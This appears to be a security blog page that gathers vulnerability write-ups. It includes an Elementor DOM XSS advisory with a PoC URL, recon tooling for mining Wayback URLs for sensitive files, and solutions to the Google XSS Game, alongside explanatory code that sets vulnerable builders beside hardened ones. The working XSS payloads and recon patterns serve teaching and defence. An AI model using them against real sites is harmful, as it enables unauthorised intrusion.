– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor's Elementor Website Builder plugin, versions <= 3.5.5. This issue leads to: CVE-2022-29455
4websecurity.com already reported the vulnerability to tens of thousands of websites that are using WordPress and this version of the plugin.
Reference:
– https://nvd.nist.gov/vuln/detail/CVE-2022-29455
– https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
– https://www.rotem-bar.com/elementor
* POC (Proof Of Concept):
The payload is Base64 encoded:
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=
Decoded from Base64:
https://example.com/#elementor-action:action=lightbox&settings={"type":"video","url":"http://","videoType":"hosted","videoParams":{"onerror":"alert(document.domain)"}}
Impact: XSS can cause…
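The following is an added example, not Elementor's code and not part of the advisory above. It models the pattern the PoC exercises: a base64 JSON "settings" blob in the URL fragment is decoded on the client and its keys are copied onto a DOM element, so the attacker controls attribute names and `onerror` becomes an inline handler. Nothing reaches the server, which is why the issue is DOM-based. The fragment format is the PoC's; the tag builders, function names and the allowlist are assumptions for illustration.

```javascript
// Added example, not Elementor's code. It models the pattern the advisory above
// describes: a JSON "settings" blob carried in the URL fragment, decoded on the
// client, whose keys are copied onto a DOM element. The fragment format is the
// PoC's; the tag builders, function names and the allowlist are assumptions.
const ACTION_PREFIX = 'elementor-action:';

// Split "#elementor-action:action=lightbox&settings=<base64 JSON>" into parts.
// Returns null when the fragment is not an action fragment. (URLSearchParams
// turns '+' into a space; the PoC blob contains none, a real decoder must cope.)
function parseActionFragment(url) {
  const hash = new URL(url).hash.slice(1); // drop the leading '#'
  if (!hash.startsWith(ACTION_PREFIX)) return null;
  const query = new URLSearchParams(hash.slice(ACTION_PREFIX.length));
  const encoded = query.get('settings');
  const settings = encoded
    ? JSON.parse(Buffer.from(encoded, 'base64').toString('utf8'))
    : {};
  return { action: query.get('action'), settings };
}

// Escape a value for use inside a double-quoted attribute. On its own this
// does not help below: the injection is in the attribute NAME, never escaped.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;').replace(/"/g, '&quot;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// VULNERABLE: every key of videoParams becomes an attribute, so
// {"onerror": "alert(document.domain)"} becomes an inline event handler.
function buildVideoTagVulnerable(settings) {
  const params = settings.videoParams || {};
  const attrs = Object.entries(params)
    .map(([name, value]) => `${name}="${escapeAttr(value)}"`)
    .join(' ');
  return `<video src="${escapeAttr(settings.url)}" ${attrs}></video>`;
}

// HARDENED: copy only known non-scripting attributes and require an http(s)
// media URL. Any on* key, or anything else unknown, is dropped.
const ALLOWED_VIDEO_PARAMS = new Set(['autoplay', 'loop', 'muted', 'controls', 'playsinline']);

function buildVideoTagHardened(settings) {
  let src;
  try {
    src = new URL(settings.url);
  } catch (e) {
    throw new TypeError('video url is not a valid absolute URL');
  }
  if (src.protocol !== 'http:' && src.protocol !== 'https:') {
    throw new TypeError('video url must be http(s)');
  }
  const params = settings.videoParams || {};
  const attrs = Object.keys(params)
    .filter((name) => ALLOWED_VIDEO_PARAMS.has(name))
    .map((name) => `${name}="${escapeAttr(params[name])}"`)
    .join(' ');
  return `<video src="${escapeAttr(src.href)}" ${attrs}></video>`;
}

// The PoC URL quoted in the advisory above.
const POC_URL = 'https://example.com/#elementor-action:action=lightbox&settings='
  + 'eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=';

// Markup the vulnerable builder produces for the PoC.
function pocMarkup() {
  return buildVideoTagVulnerable(parseActionFragment(POC_URL).settings);
}

// What the hardened builder does with the PoC: either markup without any
// handler, or an error message because "http://" is not a valid URL.
function pocHardenedOutcome() {
  try {
    return buildVideoTagHardened(parseActionFragment(POC_URL).settings);
  } catch (e) {
    return 'rejected: ' + e.message;
  }
}
```

The point of the two builders is that value escaping is the wrong control here: the attacker never needs a special character in a value, because the JSON object gives them the attribute name. The allowlist is what closes the hole; a `videoParams` object with any unexpected key is simply ignored.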
Zabbix – SAML SSO Authentication Bypass
In instances where SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because the user login stored in the session was not verified.
Dork:
Usage:
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-23131
https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
https://github.com/Mr-xn/cve-2022-23131
https://github.com/projectdiscovery/nuclei-templates
The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not
You must have heard about time travel in movies, series and comics. Well, here we are. Nah, I'm not joking: you can travel back in time and fetch the endpoints from web applications for further exploitation. Don't believe me? xD You will after travelling with TheTimeMachine. PS: it doesn't work offline, you need internet…
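What a tool of this kind actually does, as an added example that is not TheTimeMachine's code: it pulls every archived URL for a domain from the Wayback Machine and then triages the list for the endpoints a tester looks at first. The CDX query below uses the public `web.archive.org/cdx/search/cdx` parameters; the sensitive-pattern lists are an assumed starting set, and the CDX output is constructed inline so the example runs offline.

```javascript
// Added example, not TheTimeMachine's code: the two steps a Wayback-based recon
// tool performs. The CDX query uses the public web.archive.org CDX API
// parameters; the URL list below is constructed so the example runs offline.

// 1. The query a tool issues to pull every archived URL for a domain
//    (one original URL per line, collapsed on the normalised URL key).
function cdxQueryUrl(domain) {
  return 'https://web.archive.org/cdx/search/cdx?url=' + encodeURIComponent(domain + '/*')
    + '&output=text&fl=original&collapse=urlkey';
}

// 2. Triage: blank parameter values so variants of one endpoint collapse, then
//    bucket by what a tester wants first. Patterns are an assumed starting set.
const SENSITIVE_FILE = /\.(sql|bak|old|zip|tar|gz|log|env|ini|conf|config|pem|key|json|xml|ya?ml)(\?|$)/i;
const SENSITIVE_PATH = /\/(admin|backup|debug|internal|api\/v\d+|\.git|wp-config\.php|phpinfo\.php)(\/|\?|$)/i;
const INTERESTING_PARAM = /[?&](redirect|url|next|return|file|path|page|id|q|search|callback|token)=/i;

// Keep the parameter names, drop their values and the fragment.
function normalize(url) {
  const u = new URL(url);
  const blanked = new URLSearchParams();
  for (const name of u.searchParams.keys()) blanked.set(name, '');
  u.search = blanked.toString();
  u.hash = '';
  return u.toString();
}

function triage(urls) {
  const seen = new Set();
  const out = { files: [], paths: [], params: [], other: [] };
  for (const raw of urls) {
    let url;
    try {
      url = normalize(raw.trim());
    } catch (e) {
      continue; // malformed line in the archive dump; skip it
    }
    if (seen.has(url)) continue;
    seen.add(url);
    if (SENSITIVE_FILE.test(url)) out.files.push(url);
    else if (SENSITIVE_PATH.test(url)) out.paths.push(url);
    else if (INTERESTING_PARAM.test(url)) out.params.push(url);
    else out.other.push(url);
  }
  return out;
}

// Constructed sample of what the CDX endpoint returns (one URL per line).
const SAMPLE_CDX_OUTPUT = `
http://example.com/
http://example.com/index.php?page=home
http://example.com/index.php?page=about
http://example.com/backup/db.sql
http://example.com/admin/
http://example.com/login?redirect=/dashboard
http://example.com/.env
http://example.com/js/app.js
`;

function triageCdxOutput(text) {
  return triage(text.split('\n').filter((line) => line.trim() !== ''));
}
```

Blanking parameter values is what keeps the output reviewable: `?page=home` and `?page=about` are the same endpoint for testing purposes, and archives of busy sites contain thousands of such variants. Anything in `files` is worth fetching live first, since archived backups and `.env` files are sometimes still present.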
Ultimate XSS Polyglot
The Most Used Chrome Extensions for Penetration Testing.
Penetration testers mostly use these extensions to locate broken links and report them to the client; the extensions also help determine whether a target website contains vulnerabilities that can lead to exploitation and sensitive information theft. Here are the different Chrome extensions used for penetration testing…. Wappalyzer…
How I Found My First Bug Reflected Xss On PIA.GOV.PH(Philippine Information Agency)
Hi guys, this is Neil Harvey Miñano, a newbie security researcher from the Philippines. This is my first write-up, and I am not good at XSS, so forgive all mistakes. It was 04/20/2021 and my first day of bug hunting. I'm still a newbie! Today I am going to share a reflected XSS vulnerability that was reported by me to…
eG Manager v7.1.2: Improper Access Control leads to Remote Code Execution (CVE-2020-8591)
Improper Access Control to Remote Code Execution (CVE-2020-8591)
In this post, I will explain how I compromised a whole system by exploiting an improper access control vulnerability in the popular Java-based MaaS software "eG Manager", and how I escalated it to remote code execution.
Impact
The Improper Access Control weakness describes a case where software fails to properly restrict access to an object. A malicious user can compromise the security of the software and perform unauthorized actions by gaining elevated privileges, reading otherwise restricted information, executing commands, bypassing the implemented security mechanisms, etc.
Interview With Open Bug Bounty
For Aviva Zacks of Safety Detectives, speaking with the team at Open Bug Bounty was the highlight of her day. She learned that their community-driven spirit is exactly what differentiates their project from the others out there.
https://www.safetydetectives.com/blog/interview-open-bug-bounty/
Google XSS Game
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
Hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
Hint: the "welcome" post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
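Why the level 3, 4 and 6 solutions above work, and what the fix looks like in each context, as an added example that is not code from the XSS Game or from the original page. The templates and the URL blocklist below are reconstructions modelled on those levels, not copies of the game's source.

```javascript
// Added example, not code from the XSS Game or from the original page. It
// reconstructs the contexts behind the level 3, 4 and 6 solutions above to
// show why each payload works and what the fix looks like. The templates and
// the blocklist regex are assumptions modelled on those levels, not copies.

// Level 3 context: the fragment value is concatenated into markup, so a value
// containing a quote closes the src attribute and adds an onerror handler.
function level3Vulnerable(num) {
  return "<img src='/static/level3/cloud" + num + ".jpg' />";
}

// Fix: the context only ever needs a small integer, so validate for exactly
// that before any markup is built; encoding alone is not what makes this safe.
function level3Fixed(num) {
  const text = String(num);
  if (!/^[1-3]$/.test(text)) throw new RangeError('invalid image number: ' + text);
  return "<img src='/static/level3/cloud" + text + ".jpg' />";
}

// HTML-escape a value the way templating engines do by default.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// What the browser does to an attribute value before the JS engine sees it:
// character references are decoded. (Only the references above are handled.)
function decodeAttr(s) {
  const map = { amp: '&', lt: '<', gt: '>', quot: '"', '#39': "'", '#x27': "'" };
  return s.replace(/&(amp|lt|gt|quot|#39|#x27);/g, (_, ref) => map[ref]);
}

// Level 4 context: the value is HTML-escaped into an inline onload handler.
// The escaping is visible in the page source but undone before execution,
// so a quote in the input still terminates the JS string literal.
// Returns the JavaScript the browser actually runs.
function level4Executed(timer) {
  const onloadAttr = "startTimer('" + escapeHtml(timer) + "');";
  return decodeAttr(onloadAttr);
}

// Fix: encode for the inner context (a JS string literal) first, then for the
// outer one (an HTML attribute); what the browser decodes is then a literal.
function level4FixedExecuted(timer) {
  const onloadAttr = 'startTimer(' + escapeHtml(JSON.stringify(String(timer))) + ');';
  return decodeAttr(onloadAttr);
}

// Level 6 context: a blocklist that only rejects http(s) URLs lets data: and
// javascript: URLs through; an allowlist of same-origin script paths does not.
function gadgetUrlAllowedByBlocklist(url) {
  return !/^https?:\/\//i.test(url);
}
function gadgetUrlAllowedByAllowlist(url) {
  return /^\/static\/[A-Za-z0-9_-]+\.js$/.test(url);
}
```

The level 4 pair is the one worth remembering: a value can be correctly HTML-escaped and still be an injection, because the inline handler is a second parser (JavaScript) nested inside the first (HTML), and the browser hands it the decoded text. Escaping has to happen from the innermost context outwards, or the data has to be kept out of script contexts altogether, for example by reading it from a `data-` attribute with `parseInt`.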
Testing for XSS (Cross Site Scripting)
Hi, so today I'll tell you some techniques for testing XSS. First of all, note these important things: copy-pasting XSS payloads doesn't work. PoC or GTFO: as it's said, report checkers need a proper PoC to validate the report, and if it doesn't have one, your report cannot be triaged. So first, for testing XSS you…